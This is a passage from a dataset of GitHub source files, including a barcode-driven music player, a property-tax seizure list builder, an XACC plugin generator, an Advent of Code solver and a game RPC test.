path, alphanumerically sorted (assuming they have track numbers at the start)\n\t\t\tfileList = sorted(albumPath.glob('*.mp3'))\n\t\t\t# find out how many items are currently in the media list so we can insert any new items at the correct position\n\t\t\tmediaListCount = mediaList.count()\n\t\t\t# loop through each mp3 file found in the path\n\t\t\tfor y in fileList:\n\t\t\t\t# write a 'nicer' string with just the filename with no extension (the stem) in the player window\n\t\t\t\tplaylistBox.insert(tkinter.CURRENT, str(y.stem) + \"\\n\")\n\t\t\t\t# append the media to the internal playlist\n\t\t\t\tplaylist.append(y)\n\t\t\t\t# add the media to the media list\n\t\t\t\tmediaList.insert_media(vlc.Media(str(y)), mediaListCount)\n\t\t\t\tmediaListCount += 1\n\n\t\t# if the player is already playing something, we don't want to interrupt this -- so only do these if it's not playing\n\t\tif not listPlayer.is_playing():\n\t\t\tlistPlayer.set_media_list(mediaList)\n\t\t\tlistPlayer.play_item_at_index(0)\n\t\t\tpauseButton.config(text=\"||\")\n\t\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\n\t# no matching album ID in the database, probably good to display an error but right now just blanks the entry box\n\telse:\n\t\t# barcodeEntry.insert(0, \"No match!\")\n\t\t# time.sleep(3)\n\t\tbarcodeEntry.delete(0, tkinter.END)\n\t\t# playlistBox.insert(tkinter.CURRENT, \"No matching album found!\\n\")\n\n\tconn.close()\n\t\ndef clearTracks():\n\tglobal playlistPos\n\n\t# stop the player\n\tlistPlayer.stop()\n\t# clear everything displayed in the playlist window and the Now Playing label\n\tplaylistBox.delete(\"1.0\", tkinter.END)\n\tnpLabel.config(text=\"Now playing: Stopped\")\n\t# clear the playlist and reset playlist position\n\tplaylist.clear()\n\tplaylistPos = 0\n\t# clear the media list\n\tmediaListCount = mediaList.count()\n\ti = 0\n\twhile i < mediaListCount:\n\t\tmediaList.remove_index(0)\n\t\ti += 1\n\t\t\ndef songEnd(event):\n\tglobal playlistPos\n\t\n\tif playlistPos < (len(playlist) - 1):\n\t\tplaylistPos += 1\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\n# frame for playlist\nplaylistFrame = tkinter.Frame(playerWindow)\nplaylistFrame.pack()\n\n# playlist widget\nplaylistBox = tkinter.Text(playlistFrame, width=60, height=11, font=playlistFont)\nplaylistBox.pack(side=\"left\")\nscrollY = tkinter.Scrollbar(playlistFrame, orient=\"vertical\", command=playlistBox.yview)\nscrollY.pack(side=\"left\", expand=True, fill=\"y\")\nplaylistBox.configure(yscrollcommand=scrollY.set)\n\n# frame for now playing label\nnpFrame = tkinter.Frame()\nnpFrame.pack(fill=tkinter.X)\n\n# add a \"Now Playing:\" label in the controlFrame\nnpLabel = tkinter.Label(npFrame, text=\"Now playing: Stopped\", font=myFont)\nnpLabel.pack(anchor=tkinter.W, padx=10)\n\n# frame for control buttons \ncontrolFrame = tkinter.Frame()\ncontrolFrame.pack()\n\n# pack the control buttons into controlFrame\nprevButton = tkinter.Button(controlFrame, text=\"<<\", font=myFont, command=prevTrack)\nprevButton.pack(side=tkinter.LEFT)\nstopButton = tkinter.Button(controlFrame, text=\"[]\", font=myFont, command=stopTrack)\nstopButton.pack(side=tkinter.LEFT)\npauseButton = tkinter.Button(controlFrame, text=\">\", font=myFont, command=pauseTrack)\npauseButton.pack(side=tkinter.LEFT)\nnextButton = tkinter.Button(controlFrame, text=\">>\", font=myFont, command=nextTrack)\nnextButton.pack(side=tkinter.LEFT)\n\n# frame for extra buttons\nextraFrame = tkinter.Frame()\nextraFrame.pack()\n\n# pack the extra widgets into extraFrame\nbarcodeLabel = tkinter.Label(extraFrame, text=\"UPC Code\", font=myFont)\nbarcodeLabel.pack(side=tkinter.LEFT)\nbarcodeEntry = tkinter.Entry(extraFrame, font=myFont, width=20)\nbarcodeEntry.pack(side=tkinter.LEFT)\nbarcodeEntry.bind('', scanHandler)\nclearButton = tkinter.Button(extraFrame, text='Clear list', font=myFont, command=clearTracks)\nclearButton.pack(side=tkinter.LEFT)\n\n# set event handlers\nevents.event_attach(vlc.EventType.MediaPlayerEndReached, songEnd)\n\nplayerWindow.mainloop()\n","repo_name":"crbenne/musicBox","sub_path":"musicBox.py","file_name":"musicBox.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10868273740","text":"import os\nimport time\n# import module\nimport pandas as pd\nimport xlsxwriter\nimport openpyxl\nfrom openpyxl import Workbook\nfrom datetime import datetime,timedelta\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nfrom math import radians, sin, cos, sqrt, atan2\nimport read_data as rd\nimport calaculate_distance as cd\nfrom geopy.geocoders import Nominatim\nfrom openpyxl.styles import PatternFill\n#-----------------------------------------------------------------------------------------------------------------------\n## Define the today's date\n# Define today's date\ntoday = datetime.today().date()\n# Date format's\ntday_dbyfmt = today.strftime(\"%d_%b_%Y\")\ntday_dmyfmt = today.strftime(\"%d%m%Y\")\n# ---------------------------------------------------------------------------------------------------\n\n## Start\nif __name__ == '__main__':\n main_path = r\"D:/\"\n std_path = r\"D:\\Master Data/\"\n inppath = std_path + \"Input/\"\n outpth = std_path + \"Output/\" + tday_dbyfmt + \"/\"\n paidamount_file = main_path + \"Paidamount/\"\n tax_data = main_path + \"/Tax_Data/\"\n os.makedirs(outpth,exist_ok=True)\n mappath = std_path + \"Mapping/\"\n\n#-----------------------------------------------------------------------------------------\nproperty_data, bill_distributed_details, japtinotice_data,zonemap = rd.execute_data(inppath ,tax_data)\njapti_propertydata = japtinotice_data.merge(property_data,on='propertycode',how='left')\njapti_billsdata = japti_propertydata.merge(bill_distributed_details,on='propertycode',how='left')\n\ndata = rd.data_clean(japti_billsdata)\n\nidentical_col_df = pd.DataFrame(data, columns=['propertycode', 'Zone', 'Gat', 'own_mobile','Arrears', 'Current Bill', 'Total_Amount',\n 'propertyLat','propertyLong','finalusetype',\n 'propertyname', 'propertyaddress','status'])\n\n#--------------------------------------------------------------------------------------------------\n\nusetype_filter = identical_col_df[identical_col_df['finalusetype'].isin(['बिगरनिवासी', 'औद्योगिक'])]\nsttaus_np = usetype_filter[usetype_filter['status'].isin(['N' ,'P'])]\n\n# Get current location's latitude and longitude\ncurrent_lat, current_lon = cd.get_current_location()\n\n# Calculate distance for each row and add as a new column 'Distance'\nsttaus_np['Distance'] = sttaus_np.apply(lambda row: cd.calculate_distance(current_lat, current_lon, row['propertyLat'], row['propertyLong']), axis=1)\n\n# Sort the dataframe based on the 'Distance' column\ndf_sorted = sttaus_np.sort_values(by='Distance')\n\n# betwn_2L_4L = sttaus_np[(sttaus_np['Total_Amount'] >= 200000) & (sttaus_np['Total_Amount'] < 400000)]\ndf_above2L = df_sorted[(df_sorted['Total_Amount'] >= 200000)]\n\n#--------------------------------------------------------------------------------------------------\ndf_above2L['Zone_eng'] = df_above2L['Zone'].map(zonemap)\n\nlst = [ 'Bhosari', 'Nigdi Pradhikaran', 'Talvade', 'Chinchwad', 'Chikhali','Charholi',\n 'Pimpri Nagar', 'Thergaon', 'Fugewadi Dapodi', 'Moshi']\nselctedzone_data = df_above2L[df_above2L['Zone_eng'].isin(lst)]\n\nwout_latlong = selctedzone_data[selctedzone_data['propertyLong'] > 0]\n\n#----------------------------------------------------------------------------------------------------\n# lst = ['Akurdi', 'Bhosari', 'Dighi Bopkhel', 'MNP Bhavan', 'Nigdi Pradhikaran', 'Talvade', 'Chinchwad', 'Chikhali',\n# 'Pimpri Nagar', 'Thergaon', 'Wakad', 'Kivle', 'Fugewadi Dapodi', 'Pimpri Waghere', 'Sangvi', 'Charholi', 'Moshi']\n\n#-----------------------------------------------------------------------------------------------------\n# gatt = wout_latlong['Gat'].unique().tolist()\ngatt = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11,12, 13,14, 15, 16,17,18]\n\nselcted_data = pd.DataFrame(wout_latlong, columns=['Zone', 'Gat', 'propertycode',\n 'own_mobile', 'Arrears', 'Current Bill', 'Total_Amount',\n 'propertyLat','propertyLong','finalusetype',\n 'propertyname', 'propertyaddress',\n 'Zone_eng'])\nrename_data = selcted_data.rename(columns={'Zone':'झोन', 'Gat':'गट क्र', 'propertycode':'मालमत्ता क्रमांक',\n 'own_mobile':'मोबाईल क्र.', 'Arrears':'थकबाकी', 'Current Bill':'चालू मागणी रु.', 'Total_Amount':'एकुण मागणी रु.',\n 'finalusetype':'वापर प्रकार',\n 'propertyname':'मालकाचे नाव', 'propertyaddress':'मालमत्तेचा पत्ता'})\n\n# Function to create Google Maps link\ndef create_google_maps_link(lat, lon):\n return f\"https://www.google.com/maps/search/?api=1&query={lat},{lon}\"\n\n# Create a new column 'GoogleMapsLink'\nrename_data['GoogleMapsLink'] = rename_data.apply(lambda row: create_google_maps_link(row['propertyLat'], row['propertyLong']), axis=1)\n\n#\n# rename_data = pd.DataFrame(rename_data, columns=['झोन','गट क्र','मालमत्ता क्रमांक','वापर प्रकार','मालकाचे नाव','मोबाईल क्र.',\n# 'थकबाकी','चालू मागणी रु.','एकुण मागणी रु.','मालमत्तेचा पत्ता',\n# 'propertyLat','propertyLong','GoogleMapsLink','Call_Date1','Call_Date2',\n# 'Japti_Date','Japti_Status','कारणे',\n# 'Zone_eng'])\n\narrange_data = pd.DataFrame(rename_data, columns=['झोन','गट क्र','मालमत्ता क्रमांक','वापर प्रकार','मालकाचे नाव','मोबाईल क्र.',\n 'थकबाकी','चालू मागणी रु.','एकुण मागणी रु.','मालमत्तेचा पत्ता',\n 'GoogleMapsLink','Call_Date1','Call_Date2',\n 'Japti_Date','Japti_Status','कारणे',\n 'Zone_eng'])\n\narrange_data.to_excel(outpth + \"TotalJaptiDataList.xlsx\",index=False)\n#--------------------------------------------------------------------------------------------------\n\nfor i in lst:\n writer = pd.ExcelWriter(outpth + \"/\" + f\"{i}-Japti List.xlsx\", engine=\"xlsxwriter\")\n for j in gatt:\n filterdata = arrange_data[(arrange_data['Zone_eng'] == i) & (arrange_data['गट क्र'] == j)]\n if len(filterdata) == 0:\n pass\n else:\n filterdata = filterdata.drop(columns=['Zone_eng'])\n filterdata.to_excel(writer, index=False, sheet_name=f\"गट क्र._({str(j)})\")\n\n wb_length = len(filterdata)\n worksheet = writer.sheets[f\"गट क्र._({str(j)})\"]\n\n # rule = '\"कोर्ट केस,कोर्ट केसस्टे,केंद्रीय सरकारमालमत्ता,राज्य सरकार मालमत्ता,महानगरपालिकेची मालमत्ता,रस्ता रुंदीकरण्यात पडलेली मालमत्ता,''दुबार मालमत्ता,मोकळी जमीन रद्द करणे,बंद कंपनी,पडीक/जीर्ण मालमत्ता,सापडत नसलेली मालमत्ता,BIFR/Liquidation,इतर,\"'\n # rule = '\"Yes,No\"'\n # dropdown_range = f'R2:R{wb_length + 1}'\n # worksheet.data_validation(dropdown_range, {'validate': 'list', 'source': rule})\n worksheet.freeze_panes(1, 3)\n workbook = writer.book\n\n worksheet.set_column('C1:O1', 13)\n # worksheet.set_column('D1:D1', 16)\n border_format = workbook.add_format({'border': 1,\n 'align': 'left',\n 'font_color': '#000000',\n 'font_size': 20})\n worksheet.conditional_format(f'A1:T{wb_length + 1}', {'type': 'cell',\n 'criteria': '>=',\n 'text_wrap': True,\n 'value': 0,\n 'format': border_format})\n worksheet.set_row(wb_length + 1, 28)\n red_fill = PatternFill(start_color='FF0000', end_color='FF0000', fill_type='solid')\n blue_fill = PatternFill(start_color='0000FF', end_color='0000FF', fill_type='solid')\n\n worksheet.conditional_format(f'I2:I{wb_length + 1}', {'type': 'cell',\n 'criteria': '>=',\n 'value': 400000,\n 'format': workbook.add_format({'bg_color': 'red', 'font_color': 'white'})})\n worksheet.conditional_format(f'I2:I{wb_length + 1}', {'type': 'cell',\n 'criteria': '<',\n 'value': 400000,\n 'format': workbook.add_format({'bg_color': 'blue', 'font_color': 'white'})})\n writer.close()\n\n\n","repo_name":"yadnesh9trix/Japti_Notices","sub_path":"Code/japtinotice_forzonaltarget.py","file_name":"japtinotice_forzonaltarget.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43563259896","text":"from tkinter import Canvas, Tk\n\n\nclass Station:\n\n def __init__(self, xcoor, ycoor, color):\n self.size = 8\n self.xcoor_left = xcoor - self.size\n self.ycoor_bottom = ycoor - self.size\n self.xcoor_right = xcoor + self.size\n self.ycoor_top = ycoor + self.size\n self.color = color\n\n\nclass TrainCanvas(Canvas):\n\n def __init__(self, master):\n super().__init__(master, width=900, height=900, bg=\"white\")\n self.pack()\n self.stations = [] # keeps track of Ball objects\n self.trains = [] # keeps track of Ball objects representation on the Canvas\n\n def add_stations(self, list_stations):\n for i in range(len(list_stations)):\n station = Station(list_stations[i][0], list_stations[i][1], list_stations[i][2])\n self.stations.append(\n self.create_oval(station.xcoor_left, station.ycoor_bottom, station.xcoor_right, station.ycoor_top,\n outline=station.color, width=\"3\"))\n\n # self.delete(self.stations[1])\n\n\nif __name__ == '__main__':\n shop_window = Tk()\n shop_window.geometry(\"900x900\")\n c = TrainCanvas(shop_window)\n\n c.add_stations([[50, 50, \"red\"], [200, 200, \"green\"], [800, 800, \"blue\"]])\n shop_window.mainloop()\n","repo_name":"jtrailor/MBTA_Tracker","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35328734262","text":"import os\n\n# 定义要处理的文件夹路径\nfolder_path = input('Please enter your Sector Path:')\n\n# 获取文件夹中所有以.prf为后缀的文件\nfile_list = [f for f in os.listdir(folder_path) if f.endswith('_TWR.prf')]\n\n# 遍历每个文件\nfor file_name in file_list:\n file_path = os.path.join(folder_path, file_name)\n \n # 打开文件并读取内容\n with open(file_path, 'r', errors='ignore') as file:\n lines = file.readlines()\n \n # 删除第5至第56行内容\n del lines[31:51] # 注意:这里索引从0开始,即:第一行为0,第二行为1,以此类推\n \n # 再次打开文件并写入修改后的内容\n with open(file_path, 'w', errors='ignore') as file:\n file.writelines(lines)\n\nprint(\"删除操作已完成。\")","repo_name":"AaronZSAM101/SectorDeveloping","sub_path":"Model/ExistingFileFactory/删除指定行文本.py","file_name":"删除指定行文本.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10155609350","text":"#! /usr/bin/env python3\n\nimport sys\nimport os.path\nimport random\nimport math\n\ndef main():\n _path = \"sin2.txt\"\n _number = 1000000\n _range_max = 200\n _range_min = 50\n _x_max = 500\n _x_min = 0\n\n argv = sys.argv;\n argc = len(argv)\n\n if(argc == 2):\n _path = sys.argv[1];\n elif(argc == 3):\n _range_max = int(argv[1])\n _range_min = int(argv[2])\n elif(argc == 4):\n _path = (argv[1])\n _range_max = int(argv[2])\n _range_min = int(argv[3])\n\n\n fout = open(os.path.abspath(_path), 'w')\n fout.write(str(_x_min) + \" \" + str(_x_max) + \"\\n\");\n fout.write(str(-100) + \" \" + str(3000) + \"\\n\");\n\n fout.write(str(_number) + \"\\n\");\n\n for i in range(_number):\n tmp = math.sin(i/30000)*120 + math.sin(i/1000)*100 + math.sin(50*i) + (math.sin(i/20) * 60);\n if(random.randint(0,1000) % 100 == 0):\n tmp *= 3\n sin_line = (_range_max + 600) + tmp\n number = sin_line + (random.randint(5, 20) * math.sin(i))\n fout.write(str(number) + \" \")\n fout.write(\"\\n\")\n\n\n #for i in range(_number):\n # tmp = (math.sin(i/20) * 100);\n # if(random.randint(0,1000) % 100 == 0):\n # tmp *= 3\n # sin_line = (_range_max + 600) + tmp\n # number = sin_line + (random.randint(5, 20) * math.sin(i)) + 900\n # fout.write(str(number) + \" \")\n #fout.write(\"\\n\")\n\n\n\nmain()\n\n\n\n\n\n\n","repo_name":"pestanko/big_sequences_graph","sub_path":"serverjs/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42488064349","text":"import argparse\nimport os\n\n\nPLUGIN_TYPES = {\"compiler\", \"irtransformation\", \"iroptimization\", \"gate-instruction\", \"benchmark-algorithm\"}\n\nDESCRIPTION = \"\"\"\nA utility for generating plugin skeletons.\nE.g. to generate a new compiler plugin for the \"my_lang\" language, run\n'python3 -m xacc generate-plugin -t compiler -n my_lang'\n\"\"\"\n\ndef add_subparser(subparsers):\n \"\"\"Add the 'generate-plugin' subparser to subparsers.\"\"\"\n subparser = subparsers.add_parser(\"generate-plugin\", help=\"A utility for generating plugin skeletons.\", description=DESCRIPTION,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n subparser.add_argument(\"-o\", \"--output\", help=\"output location (defaults to current directory)\")\n subparser.add_argument(\"-v\", \"--verbose\", help=\"increase verbosity\", action=\"store_true\")\n subparser.add_argument(\"-l\", \"--list\", help=\"list available plugin types\", action=\"store_true\")\n required_group = subparser.add_argument_group(\"required arguments\")\n required_group.add_argument(\"-t\", \"--type\", help=\"plugin type\", choices=PLUGIN_TYPES)\n required_group.add_argument(\"-n\", \"--name\", help=\"plugin name\")\n\n\ndef run_generator(args, xacc_root):\n \"\"\"Run the appropriate generator given args.\"\"\"\n if args.list and args.type == None and args.name == None:\n print(\"Avalable plugin types:\")\n print(PLUGIN_TYPES)\n exit(0)\n if args.type and args.name:\n args.libname = \"xacc-{}\".format(args.name.lower())\n if args.output:\n os.chdir(args.output)\n os.mkdir(args.libname)\n templates_dir = os.path.join(os.path.dirname(__file__), \"templates/\")\n output_dir = os.path.join(os.getcwd(), args.libname)\n if args.type.lower() in [\"irtransformation\",\"iroptimization\"]:\n template_dir = os.path.join(templates_dir, \"irtransformation/\")\n if args.verbose:\n print(\"Generating an IR Optimization or Transformation plugin...\")\n generate_irtransformation(template_dir, output_dir, xacc_root, args)\n elif args.type.lower() == \"compiler\":\n template_dir = os.path.join(templates_dir, \"compiler/\")\n if args.verbose:\n print(\"Generating a compiler plugin...\")\n generate_compiler(template_dir, output_dir, xacc_root, args)\n elif args.type.lower() == \"accelerator\":\n print('Accelerator plugin gen not implemented yet.')\n return\n elif args.type.lower() == \"gate-instruction\":\n template_dir = os.path.join(templates_dir, \"gate_instruction/\")\n if args.verbose:\n print(\"Generating a gate-instruction plugin...\")\n generate_instruction(template_dir, output_dir, xacc_root, args)\n elif args.type.lower() == \"benchmark-algorithm\":\n template_dir = os.path.join(templates_dir, \"benchmark_algorithm\")\n if args.verbose:\n print(\"Generating a benchmark-algorithm plugin...\")\n generate_benchmark_algorithm(template_dir, output_dir, xacc_root, args)\n else:\n print(\"Please specify a type (-t) and name (-n). Use -l (--list) to see available plugins to generate\")\n\ndef generate(template_dir, output_dir, format_func, verbose=False):\n for dirpath, dirnames, filenames in os.walk(template_dir):\n dir_rel_path = os.path.relpath(dirpath, template_dir)\n if verbose:\n print(\"Entered {}/\".format(dir_rel_path))\n for dirname in dirnames:\n outdir_name = format_func(dirname)\n outdir_path = os.path.join(output_dir, dir_rel_path, outdir_name)\n os.mkdir(outdir_path)\n if verbose:\n print(\"Created {}\".format(outdir_path))\n for filename in filenames:\n with open(os.path.join(dirpath, filename), 'r') as template_file:\n contents = template_file.read()\n outfile_name = format_func(filename)\n outfile_path = os.path.join(output_dir, dir_rel_path, outfile_name)\n contents = format_func(contents)\n with open(outfile_path, 'w') as outfile:\n outfile.write(contents)\n if verbose:\n print(\"Created {}\".format(outfile_path))\n\n\ndef generate_irtransformation(template_dir, output_dir, xacc_root_path, args):\n irt_lib_name = \"{}transformation\".format(args.libname)\n class_name = \"{}IRTransformation\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n irt_bundle_name=irt_lib_name.replace('-','_'),\n irt_lib_name=irt_lib_name,\n irt_class_name=class_name,\n irt_class_name_lower=class_name.lower(),\n irt_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\n\ndef generate_compiler(template_dir, output_dir, xacc_root_path, args):\n compiler_lib_name = \"{}compiler\".format(args.libname)\n class_name = \"{}Compiler\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n compiler_bundle_name=compiler_lib_name.replace('-', '_'),\n compiler_lib_name=compiler_lib_name,\n compiler_class_name=class_name,\n compiler_class_name_lower=class_name.lower(),\n compiler_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\ndef generate_instruction(template_dir, output_dir, xacc_root_path, args):\n inst_lib_name = \"{}instruction\".format(args.libname)\n class_name = \"{}\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n inst_bundle_name=inst_lib_name.replace('-','_'),\n inst_lib_name=inst_lib_name,\n inst_class_name=class_name,\n inst_class_name_lower=class_name.lower(),\n inst_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\ndef generate_benchmark_algorithm(template_dir, output_dir, xacc_root_path, args):\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n benchmark_algorithm_name=args.name\n ), verbose=args.verbose)\n","repo_name":"eclipse/xacc","sub_path":"python/plugin_generator/plugin_generator.py","file_name":"plugin_generator.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"48"} +{"seq_id":"72779040465","text":"from pathlib import Path\nfrom itertools import chain\n\n\ndef build_texts_from_repository(repo_dir):\n \"\"\"Return a dataset of the code\n \"\"\"\n dataset = []\n file_types = []\n for path in chain(\n Path(repo_dir).glob(\"**/*.py\"),\n Path(repo_dir).glob(\"**/*.md\"),\n ):\n assert path.is_file() and path.suffix\n lines = path.read_text().splitlines()\n \n dataset.extend(\n [{\"line_number\": i,\n \"line\": line,\n \"path\": str(path.relative_to(repo_dir))}\n for i, line in enumerate(lines)\n ]\n )\n return dataset\n\n\ndef build_query_dataset(queries, dataset):\n ...\n","repo_name":"namoopsoo/interview-me","sub_path":"code_search.py","file_name":"code_search.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42127044691","text":"from dataclasses import dataclass\nfrom enum import Flag\nfrom importlib.resources import open_text\nfrom itertools import islice\nfrom typing import Dict, List, Mapping\n\n\nclass Segment(Flag):\n A, B, C, D, E, F, G = 1, 2, 4, 8, 16, 32, 64\n\n @classmethod\n def parse(cls, s: str) -> \"Segment\":\n value = 0\n for c in s.upper():\n value |= cls[c].value\n\n return cls(value)\n\n def __len__(self) -> int:\n return bin(self.value).count(\"1\")\n\n def __iter__(self):\n return (s for s in self.__class__ if s in self)\n\n\n@dataclass\nclass Entry:\n signals: List[Segment]\n digits: List[Segment]\n\n @classmethod\n def parse(cls, s: str) -> \"Entry\":\n words = s.split()\n if len(words) != 15 or words[10] != \"|\":\n raise ValueError(\"Expected 10 signal patterns followed by 4 digits.\")\n\n # Parse 10 words as segments, the '|' separator and 4 words as segments.\n iterator = iter(words)\n signals = list(map(Segment.parse, islice(iterator, 10)))\n digits = list(map(Segment.parse, islice(iterator, 1, None)))\n\n return cls(signals, digits)\n\n def decode(self) -> int:\n digits = self.find_digits()\n\n # Use the mapping to decode the digits and combine them into an integer.\n value = 0\n length = len(self.digits)\n for i in range(length):\n value += 10 ** (length - i - 1) * digits[self.digits[i]]\n\n return value\n\n def find_digits(self) -> Mapping[Segment, int]:\n # Start by creating maps for digits and segments.\n digits: Dict[int, Segment] = {}\n mapping: Dict[Segment, Segment] = {}\n\n # Find 2 as it is the only digit not to contain segment F.\n for f in Segment:\n found = [s for s in self.signals if f not in s]\n if len(found) == 1:\n digits[2] = found[0]\n mapping[Segment.F] = f\n break\n else:\n raise ValueError(\"Cannot find segment F.\")\n\n # Find 7 (three segments) and 1 (two segments); we can find segment A.\n digits[1] = next(s for s in self.signals if len(s) == 2)\n digits[7] = next(s for s in self.signals if len(s) == 3)\n mapping[Segment.A] = digits[1] ^ digits[7]\n\n # Deduce segment C from 1.\n mapping[Segment.C] = digits[1] ^ mapping[Segment.F]\n\n # Find 6 by removing C from 8.\n digits[8] = next(s for s in self.signals if len(s) == 7)\n digits[6] = digits[8] ^ mapping[Segment.C]\n\n # Find 5 which differs from 6 with segment E removed.\n for e in digits[6]:\n five = digits[6] ^ e\n if five in self.signals:\n digits[5] = five\n mapping[Segment.E] = e\n break\n else:\n raise ValueError(\"Cannot find segment E.\")\n\n # Find 9 which differs from 8 with segment E removed.\n digits[9] = digits[8] ^ mapping[Segment.E]\n\n # Find 4 (four segments).\n digits[4] = next(s for s in self.signals if len(s) == 4)\n\n # Find segment G by adding segment A to 4 then compare with 9.\n mapping[Segment.G] = digits[9] ^ (digits[4] | mapping[Segment.A])\n\n # Find segment B and D by using the difference of 1 and 4 and remove either\n # from 9 to find 3.\n b_d = digits[1] ^ digits[4]\n for b in b_d:\n three = digits[9] ^ b\n if three in self.signals:\n digits[3] = three\n mapping[Segment.B] = b\n mapping[Segment.D] = b_d ^ b\n break\n else:\n raise ValueError(\"Cannot find segment B.\")\n\n # Find 0 by removing D from 8.\n digits[0] = digits[8] ^ mapping[Segment.D]\n\n # Finally, flip the digits mapping and return it.\n return {s: d for d, s in digits.items()}\n\n\ndef _get_entries() -> List[Entry]:\n with open_text(\"aoc21.days\", \"day08.txt\") as f:\n return list(map(Entry.parse, f))\n\n\ndef part1() -> object:\n # The digits 1, 4, 7 and 8 have 2, 4, 3 and 7 segments respectively.\n unique = (2, 3, 4, 7)\n return sum(1 for e in _get_entries() for d in e.digits if len(d) in unique)\n\n\ndef part2() -> object:\n return sum(map(Entry.decode, _get_entries()))\n","repo_name":"macph/aoc21","sub_path":"src/aoc21/days/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37737758237","text":"from pxtest import PXTest\n\n\nclass SplitStateRpcsTest (PXTest):\n\n def run (self):\n self.collectPremine ()\n\n # Set up a non-trivial situation, where we have characters, prospected\n # regions, kills/fame, buildings, ground loot and ongoing operations.\n self.initAccount (\"prospector\", \"r\")\n self.initAccount (\"killed\", \"g\")\n self.sendMove (\"sale buyer\", {\"vc\": {\"m\": {}}}, burn=10)\n self.dropLoot ({\"x\": 1, \"y\": 2}, {\"foo\": 5, \"bar\": 10})\n self.dropLoot ({\"x\": -1, \"y\": 20}, {\"foo\": 5})\n self.build (\"checkmark\", None, {\"x\": -100, \"y\": 200}, rot=5)\n self.createCharacters (\"prospector\")\n self.createCharacters (\"killed\")\n self.generate (1)\n self.moveCharactersTo ({\n \"prospector\": {\"x\": 0, \"y\": 0},\n \"killed\": {\"x\": 0, \"y\": 0},\n })\n self.setCharactersHP ({\n \"killed\": {\"a\": 1, \"s\": 0},\n })\n self.getCharacters ()[\"prospector\"].sendMove ({\"prospect\": {}})\n self.generate (20)\n self.moveCharactersTo ({\n \"prospector\": {\"x\": 100, \"y\": -100},\n })\n self.getCharacters ()[\"prospector\"].sendMove ({\"prospect\": {}})\n self.generate (3)\n\n # Test that the full game state corresponds to the split RPCs.\n state = self.getGameState ()\n accounts = self.getRpc (\"getaccounts\")\n buildings = self.getRpc (\"getbuildings\")\n characters = self.getRpc (\"getcharacters\")\n loot = self.getRpc (\"getgroundloot\")\n ongoings = self.getRpc (\"getongoings\")\n regions = self.getRpc (\"getregions\", fromheight=0)\n moneySupply = self.getRpc (\"getmoneysupply\")\n prizes = self.getRpc (\"getprizestats\")\n assert len (accounts) > 0\n assert len (buildings) > 0\n assert len (characters) > 0\n assert len (loot) > 0\n assert len (ongoings) > 0\n assert len (regions) > 0\n assert len (moneySupply[\"entries\"]) > 0\n assert len (prizes) > 0\n self.assertEqual (accounts, state[\"accounts\"])\n self.assertEqual (buildings, state[\"buildings\"])\n self.assertEqual (characters, state[\"characters\"])\n self.assertEqual (loot, state[\"groundloot\"])\n self.assertEqual (ongoings, state[\"ongoings\"])\n self.assertEqual (regions, state[\"regions\"])\n self.assertEqual (moneySupply, state[\"moneysupply\"])\n self.assertEqual (prizes, state[\"prizes\"])\n\n # Test the bootstrap data.\n self.assertEqual (self.getRpc (\"getbootstrapdata\"), {\n \"regions\": regions,\n })\n\n\nif __name__ == \"__main__\":\n SplitStateRpcsTest ().main ()\n","repo_name":"xaya/taurion_gsp","sub_path":"gametest/splitstaterpcs.py","file_name":"splitstaterpcs.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"7433748996","text":"class Solution:\n def twoSum(self, nums, target):\n lens = len(nums)\n\n \n for i in range(lens):\n #print(i)\n for j in range(i+1, lens):\n #print(nums[i], nums[j], target)\n if nums[i] + nums[j] == target:\n #print(\"aa\")\n return [i, j]\n\n return []\n\n def twoSum_2(self, nums, target):\n lens = len(nums)\n\n dicts = {}\n\n for i in range(lens):\n another = target - nums[i]\n if(another in dicts):\n return [dicts[another], i]\n\n dicts[nums[i]] = i\n\n #print(dicts)\n for k,v in dicts.items():\n another = target - k\n\n #print(k, another)\n if(k!=another and another in dicts):\n return [v, dicts[another]]\n \n \n\n return []\n\n\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n t1 = [3, 2, 4]\n t2 = 6\n\n result = solution.twoSum_2(t1, t2)\n\n 